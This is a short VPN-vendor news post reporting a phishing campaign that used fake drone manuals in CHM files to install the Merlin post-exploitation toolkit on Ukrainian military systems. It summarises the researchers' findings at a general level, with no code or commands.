Ukraine Merlin Attack

Ukraine Military Targeted By a Post-Exploitation Toolkit Installed Through Phishing 

2 Mins Read

PureVPNNewsUkraine Military Targeted By a Post-Exploitation Toolkit Installed Through Phishing 

Ukrainian military organizations have fallen victim to a phishing campaign, with cyber attackers using drone manuals as bait to deliver a Go-based open-source post-exploitation toolkit known as Merlin.

https://x.com/CyberThreader/status/1692354322066018465?s=20

Details about the campaign

Because drones or Unmanned Aerial Vehicles (UAVs) have become crucial tools for the Ukrainian military, there has been a surge in malware-laden lure files disguised as UAV service manuals, according to a report by Securonix researchers.

Image Description: Sample of malicious email

The cybersecurity company is monitoring this cyber threat under the code STARK#VORTEX.

Attack Vectors

  • The attack begins with a Microsoft Compiled HTML Help (CHM) file. When this file is opened, it triggers malicious JavaScript code embedded within one of the HTML pages.
  • This JavaScript code executes PowerShell commands designed to connect with a remote server, from which it retrieves an obfuscated binary.
  • Once decoded, this Windows-based payload extracts the Merlin Agent. This agent is configured to communicate with a command-and-control (C2) server, enabling the attackers to take control of the compromised host.
Merlin to avoid detection by AV. Merlin is an HTTP / 2 Command & Control

“While the attack chain appears straightforward, the attackers have employed rather sophisticated Tactics, Techniques, and Procedures (TTPs) and obfuscation methods to evade detection,” noted the researchers.

Has it happened before?

This is the first time Ukrainian government entities have been targeted using the Merlin toolkit. 

In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employed CHM files as decoys to infect computers with this open-source tool.

The CERT-UA attributed these intrusions to a threat actor they track under the name UAC-0154.

The researchers clarified,

“The files and documents in this attack chain are highly effective at evading defenses. Normally, receiving a Microsoft help file online would be considered unusual.”

However, the attackers crafted the lure documents to resemble something an unsuspecting victim might expect to encounter in a help-related document or file.

Ukraine War: Not only humanity but cyber sustenance at risk

Using drone manuals as bait sounds like something cunning exploiting the military reliance on UAVs. The threat actors have become crafty with malicious codes in Javascript and Powershell commands. 

In a hostile environment, defending from cyber attacks is challenging for the nation. Let’s stand against War and Cyber War together!

author

PureVPN

date

October 2, 2023

time

2 years ago

PureVPN is a leading VPN service provider that excels in providing easy solutions for online privacy and security. With 6000+ servers in 65+ countries, It helps consumers and businesses in keeping their online identity secured.

Related Stories

Snapchat Down Worldwide Amid Major AWS Outage: What We Know So Far

Snapchat Down Worldwide Amid Major AWS Outage: What We Know So Far
Posted on October 20, 2025
Slack Faces Partial Outage: Users Report Message Delays and Loading Issues

Slack Faces Partial Outage: Users Report Message Delays and Loading Issues
Posted on October 20, 2025
Arizona Sees Surge in VPN Demand After Age Verification Laws Take Effect

Arizona Sees Surge in VPN Demand After Age Verification Laws Take Effect
Posted on October 8, 2025

Have Your Say!!